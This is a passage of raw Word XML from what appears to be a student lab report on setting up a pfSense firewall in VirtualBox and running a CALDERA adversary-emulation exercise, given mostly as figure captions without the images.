      <w:r w:rsidR="009F64AC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>configured in the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E48B6A3" w14:textId="1E080E16" w:rsidR="007E0750" w:rsidRDefault="007E0750" w:rsidP="007E0750">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PfSense configuration process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F60FE" w14:textId="398B9CA7" w:rsidR="007E0750" w:rsidRPr="007C6D3E" w:rsidRDefault="007E0750" w:rsidP="007E0750">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A97A2C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">While we were configuring the </w:t>
      </w:r>
      <w:r w:rsidR="003B522B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PfSense Firewall, we</w:t>
      </w:r>
      <w:r w:rsidR="0068063D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003B522B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> unfortunately</w:t>
      </w:r>
      <w:r w:rsidR="0068063D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003B522B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> downloaded the wrong .iso image file to mount onto Virtual Box</w:t>
      </w:r>
      <w:r w:rsidR="0068063D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PfSense Netgate installer v2.7.0)</w:t>
      </w:r>
      <w:r w:rsidR="003B522B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it took </w:t>
      </w:r>
      <w:r w:rsidR="00C65902">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at least five</w:t>
      </w:r>
      <w:r w:rsidR="003B522B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hours to search online for an older version (PfSense Community Edition v2.7.0)</w:t>
      </w:r>
      <w:r w:rsidR="0068063D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for us to reconfigure</w:t>
      </w:r>
      <w:r w:rsidR="00C65902">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F26CC8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This resulted in a loss of a day </w:t>
      </w:r>
      <w:r w:rsidR="00E326B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that was allocated toward configuring and simulating our topology.</w:t>
      </w:r>
      <w:r w:rsidR="00C65902">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fortunately, the configuration was a success </w:t>
      </w:r>
      <w:r w:rsidR="001D5226">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C466639" w14:textId="53872F56" w:rsidR="004955C5" w:rsidRPr="00FF6966" w:rsidRDefault="004955C5" w:rsidP="009054D6">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E566587" w14:textId="26785693" w:rsidR="00834922" w:rsidRDefault="009303D9" w:rsidP="001779F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figures and</w:t>
      </w:r>
      <w:r w:rsidR="00A75527" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C86E5" w14:textId="23A25753" w:rsidR="001779F6" w:rsidRPr="001779F6" w:rsidRDefault="001779F6" w:rsidP="001779F6"/>
    <w:p w14:paraId="124DC2F3" w14:textId="77777777" w:rsidR="001C1108" w:rsidRDefault="008C63F9" w:rsidP="001C1108">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E61594C" wp14:editId="1F64F4D7">
            <wp:extent cx="3089910" cy="1920875"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="508162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62583" name="Picture 1"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9910" cy="1920875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F42123A" w14:textId="595281CD" w:rsidR="00163E6F" w:rsidRPr="0020663D" w:rsidRDefault="001C1108" w:rsidP="001C1108">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020663D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="0020663D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0020663D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0081320B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="0020663D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0020663D" w:rsidRPr="0020663D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Caldera Successful Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727599A9" w14:textId="77777777" w:rsidR="00163E6F" w:rsidRDefault="00163E6F" w:rsidP="00163E6F"/>
    <w:p w14:paraId="7FEB447B" w14:textId="77777777" w:rsidR="00163E6F" w:rsidRPr="00163E6F" w:rsidRDefault="00163E6F" w:rsidP="00163E6F"/>
    <w:p w14:paraId="695B1A3E" w14:textId="77777777" w:rsidR="0070555C" w:rsidRDefault="0070555C" w:rsidP="0070555C"/>
    <w:p w14:paraId="3F5AF0C5" w14:textId="77777777" w:rsidR="007F76C3" w:rsidRDefault="007F76C3" w:rsidP="007F76C3">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F5CE087" wp14:editId="48F36311">
            <wp:extent cx="3089910" cy="2821305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18687119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11938" name="Picture 2"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9910" cy="2821305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE41584" w14:textId="3BAB8117" w:rsidR="0070555C" w:rsidRPr="00100559" w:rsidRDefault="007F76C3" w:rsidP="00100559">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0081320B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="0081578E" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D1B0C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>The agent</w:t>
      </w:r>
      <w:r w:rsidR="001A603E" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> being deployed</w:t>
      </w:r>
      <w:r w:rsidR="007523F5" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> from CALDERA GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEF7790" w14:textId="77777777" w:rsidR="0070555C" w:rsidRPr="0070555C" w:rsidRDefault="0070555C" w:rsidP="0070555C"/>
    <w:p w14:paraId="00084A20" w14:textId="77777777" w:rsidR="007523F5" w:rsidRDefault="00DD602C" w:rsidP="007523F5">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="547986DD" wp14:editId="10236982">
            <wp:extent cx="3089910" cy="1377315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18663827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82722" name="Picture 3"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9910" cy="1377315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A9D752" w14:textId="1979222B" w:rsidR="00DD602C" w:rsidRPr="00100559" w:rsidRDefault="007523F5" w:rsidP="00100559">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00780A42">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> CALDERA GUI home screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B41432" w14:textId="77777777" w:rsidR="007523F5" w:rsidRDefault="00D069A2" w:rsidP="007523F5">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="614DDAB6" wp14:editId="05EE0C4F">
            <wp:extent cx="3089910" cy="1828165"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="4657537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53719" name="Picture 4"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9910" cy="1828165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="367A4E5F" w14:textId="184DAA80" w:rsidR="006C7716" w:rsidRPr="00100559" w:rsidRDefault="007523F5" w:rsidP="00100559">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00780A42">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> End Results from Running CALDERA Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10E1ED" w14:textId="77777777" w:rsidR="00701B37" w:rsidRDefault="00053488" w:rsidP="00701B37">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79D120D2" wp14:editId="55441AD2">
            <wp:extent cx="3089910" cy="1983740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212718229"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8229" name="Picture 6" descr="A screenshot of a computer pr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9910" cy="1983740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F7247" w14:textId="57363A40" w:rsidR="00A11E73" w:rsidRPr="00100559" w:rsidRDefault="00701B37" w:rsidP="00100559">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00780A42">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C12A1D" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Selecting </w:t>
      </w:r>
      <w:r w:rsidR="00780A42">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00C12A1D" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>target for Agent on the CALDERA GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD34902" w14:textId="77777777" w:rsidR="00A11E73" w:rsidRDefault="00A11E73" w:rsidP="0070555C"/>
    <w:p w14:paraId="39944FEE" w14:textId="77777777" w:rsidR="00C12A1D" w:rsidRDefault="00D9729D" w:rsidP="00C12A1D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B62754C" wp14:editId="67B33C29">
            <wp:extent cx="3089910" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="136493062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30626" name="Picture 7"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9910" cy="1714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="300FA574" w14:textId="274E7750" w:rsidR="00A11E73" w:rsidRPr="00100559" w:rsidRDefault="00C12A1D" w:rsidP="00100559">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00780A42">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00737933" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PfSense </w:t>
      </w:r>
      <w:r w:rsidR="00630C1C" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CLI</w:t>
      </w:r>
      <w:r w:rsidR="00737933" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> showcasing </w:t>
      </w:r>
      <w:r w:rsidR="00A21A08" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA00BE" w14:textId="77777777" w:rsidR="00737933" w:rsidRDefault="00123D45" w:rsidP="00737933">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180F4964" wp14:editId="6A3D5461">
            <wp:extent cx="3089910" cy="2101215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71592082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20821" name="Picture 8"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9910" cy="2101215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B28F78" w14:textId="1F5F8DBF" w:rsidR="00123D45" w:rsidRPr="00100559" w:rsidRDefault="00737933" w:rsidP="00100559">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A4770">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Initiating Operation</w:t>
      </w:r>
